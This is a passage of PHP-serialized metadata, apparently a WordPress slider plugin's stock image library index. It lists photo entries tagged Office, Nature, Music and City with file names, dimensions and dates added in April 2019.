10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:181;a:12:{s:2:\"id\";s:3:\"418\";s:6:\"handle\";s:17:\"Cooperation-2.jpg\";s:4:\"name\";s:13:\"Cooperation 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:182;a:12:{s:2:\"id\";s:3:\"417\";s:6:\"handle\";s:33:\"MacBook-on-top-of-brown-table.jpg\";s:4:\"name\";s:29:\"MacBook on top of brown table\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:183;a:12:{s:2:\"id\";s:3:\"416\";s:6:\"handle\";s:27:\"Beautiful-working-place.jpg\";s:4:\"name\";s:23:\"Beautiful working place\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:184;a:12:{s:2:\"id\";s:3:\"415\";s:6:\"handle\";s:14:\"Typewriter.jpg\";s:4:\"name\";s:10:\"Typewriter\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:185;a:12:{s:2:\"id\";s:3:\"414\";s:6:\"handle\";s:19:\"White-desk-lamp.jpg\";s:4:\"name\";s:15:\"White desk lamp\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:186;a:12:{s:2:\"id\";s:3:\"413\";s:6:\"handle\";s:18:\"Office-working.jpg\";s:4:\"name\";s:14:\"Office working\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:187;a:12:{s:2:\"id\";s:3:\"412\";s:6:\"handle\";s:36:\"Silver-iMac-on-brown-wooden-desk.jpg\";s:4:\"name\";s:32:\"Silver iMac on brown wooden desk\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1240\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:188;a:12:{s:2:\"id\";s:3:\"411\";s:6:\"handle\";s:23:\"Working-in-progress.jpg\";s:4:\"name\";s:19:\"Working in progress\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:189;a:12:{s:2:\"id\";s:3:\"410\";s:6:\"handle\";s:15:\"Cooperation.jpg\";s:4:\"name\";s:11:\"Cooperation\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:190;a:12:{s:2:\"id\";s:3:\"409\";s:6:\"handle\";s:17:\"Working-place.jpg\";s:4:\"name\";s:13:\"Working place\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:191;a:12:{s:2:\"id\";s:3:\"408\";s:6:\"handle\";s:16:\"Working-desk.jpg\";s:4:\"name\";s:12:\"Working desk\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:192;a:12:{s:2:\"id\";s:3:\"407\";s:6:\"handle\";s:23:\"low-angle-of-forest.jpg\";s:4:\"name\";s:19:\"low angle of forest\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:193;a:12:{s:2:\"id\";s:3:\"406\";s:6:\"handle\";s:23:\"Lake-under-blue-sky.jpg\";s:4:\"name\";s:19:\"Lake under blue sky\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1351\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:194;a:12:{s:2:\"id\";s:3:\"405\";s:6:\"handle\";s:21:\"Blue-starry-night.jpg\";s:4:\"name\";s:17:\"Blue starry night\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:195;a:12:{s:2:\"id\";s:3:\"404\";s:6:\"handle\";s:22:\"Aerial-photography.jpg\";s:4:\"name\";s:18:\"Aerial photography\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1440\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:196;a:12:{s:2:\"id\";s:3:\"403\";s:6:\"handle\";s:14:\"Red-clouds.jpg\";s:4:\"name\";s:10:\"Red clouds\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:197;a:12:{s:2:\"id\";s:3:\"402\";s:6:\"handle\";s:14:\"Snow-field.jpg\";s:4:\"name\";s:10:\"Snow field\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1227\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:198;a:12:{s:2:\"id\";s:3:\"401\";s:6:\"handle\";s:13:\"White-sky.jpg\";s:4:\"name\";s:9:\"White sky\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:199;a:12:{s:2:\"id\";s:3:\"400\";s:6:\"handle\";s:24:\"Trees-covered-by-fog.jpg\";s:4:\"name\";s:20:\"Trees covered by fog\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1277\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:200;a:12:{s:2:\"id\";s:3:\"399\";s:6:\"handle\";s:26:\"Red-and-white-mushroom.jpg\";s:4:\"name\";s:22:\"Red and white mushroom\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:201;a:12:{s:2:\"id\";s:3:\"398\";s:6:\"handle\";s:24:\"Lake-near-pine-trees.jpg\";s:4:\"name\";s:20:\"Lake near pine trees\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:202;a:12:{s:2:\"id\";s:3:\"397\";s:6:\"handle\";s:35:\"After-a-long-day-of-backpacking.jpg\";s:4:\"name\";s:31:\"After a long day of backpacking\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:203;a:12:{s:2:\"id\";s:3:\"396\";s:6:\"handle\";s:32:\"Mountains-during-golden-hour.jpg\";s:4:\"name\";s:28:\"Mountains during golden hour\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:204;a:12:{s:2:\"id\";s:3:\"395\";s:6:\"handle\";s:27:\"Man-looking-on-mountain.jpg\";s:4:\"name\";s:23:\"Man looking on mountain\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:205;a:12:{s:2:\"id\";s:3:\"394\";s:6:\"handle\";s:19:\"Body-of-water-2.jpg\";s:4:\"name\";s:15:\"Body of water 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:206;a:12:{s:2:\"id\";s:3:\"393\";s:6:\"handle\";s:15:\"Brown-cliff.jpg\";s:4:\"name\";s:11:\"Brown cliff\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1440\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:207;a:12:{s:2:\"id\";s:3:\"392\";s:6:\"handle\";s:20:\"Green-foggy-tree.jpg\";s:4:\"name\";s:16:\"Green foggy tree\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1417\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:208;a:12:{s:2:\"id\";s:3:\"391\";s:6:\"handle\";s:32:\"Grayscale-photo-of-mountains.jpg\";s:4:\"name\";s:28:\"Grayscale photo of mountains\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:209;a:12:{s:2:\"id\";s:3:\"390\";s:6:\"handle\";s:19:\"Under-sunny-sky.jpg\";s:4:\"name\";s:15:\"Under sunny sky\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:210;a:12:{s:2:\"id\";s:3:\"389\";s:6:\"handle\";s:16:\"Rock-concert.jpg\";s:4:\"name\";s:12:\"Rock concert\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1443\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:211;a:12:{s:2:\"id\";s:3:\"388\";s:6:\"handle\";s:30:\"Group-of-people-in-concert.jpg\";s:4:\"name\";s:26:\"Group of people in concert\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:212;a:12:{s:2:\"id\";s:3:\"387\";s:6:\"handle\";s:6:\"DJ.jpg\";s:4:\"name\";s:2:\"DJ\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:213;a:12:{s:2:\"id\";s:3:\"386\";s:6:\"handle\";s:56:\"Woman-standing-watching-LED-light-musical-instrument.jpg\";s:4:\"name\";s:52:\"Woman standing watching LED light musical instrument\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:214;a:12:{s:2:\"id\";s:3:\"385\";s:6:\"handle\";s:16:\"Concert-hall.jpg\";s:4:\"name\";s:12:\"Concert hall\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:215;a:12:{s:2:\"id\";s:3:\"384\";s:6:\"handle\";s:18:\"Concert-hall-2.jpg\";s:4:\"name\";s:14:\"Concert hall 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:216;a:12:{s:2:\"id\";s:3:\"383\";s:6:\"handle\";s:29:\"man-playing-upright-piano.jpg\";s:4:\"name\";s:25:\"man playing upright piano\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1340\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:217;a:12:{s:2:\"id\";s:3:\"382\";s:6:\"handle\";s:30:\"person-performing-on-stage.jpg\";s:4:\"name\";s:26:\"person performing on stage\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:218;a:12:{s:2:\"id\";s:3:\"381\";s:6:\"handle\";s:27:\"Brown-string-instrument.jpg\";s:4:\"name\";s:23:\"Brown string instrument\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1272\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:219;a:12:{s:2:\"id\";s:3:\"380\";s:6:\"handle\";s:36:\"silhouette-of-person-with-guitar.jpg\";s:4:\"name\";s:32:\"silhouette of person with guitar\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:220;a:12:{s:2:\"id\";s:3:\"379\";s:6:\"handle\";s:14:\"Party-fans.jpg\";s:4:\"name\";s:10:\"Party fans\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:221;a:12:{s:2:\"id\";s:3:\"378\";s:6:\"handle\";s:24:\"Condenser-microphone.jpg\";s:4:\"name\";s:20:\"Condenser microphone\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1440\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:222;a:12:{s:2:\"id\";s:3:\"377\";s:6:\"handle\";s:42:\"Low-angle-photo-of-high-rise-buildings.jpg\";s:4:\"name\";s:38:\"Low angle photo of high rise buildings\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:24:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:223;a:12:{s:2:\"id\";s:3:\"376\";s:6:\"handle\";s:23:\"High-rise-buildings.jpg\";s:4:\"name\";s:19:\"High rise buildings\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:24:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:224;a:12:{s:2:\"id\";s:3:\"375\";s:6:\"handle\";s:16:\"Cable-bridge.jpg\";s:4:\"name\";s:12:\"Cable bridge\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1272\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:24:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:225;a:12:{s:2:\"id\";s:3:\"374\";s:6:\"handle\";s:35:\"Bokeh-effect-from-street-lights.jpg\";s:4:\"name\";s:31:\"Bokeh effect from street lights\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New 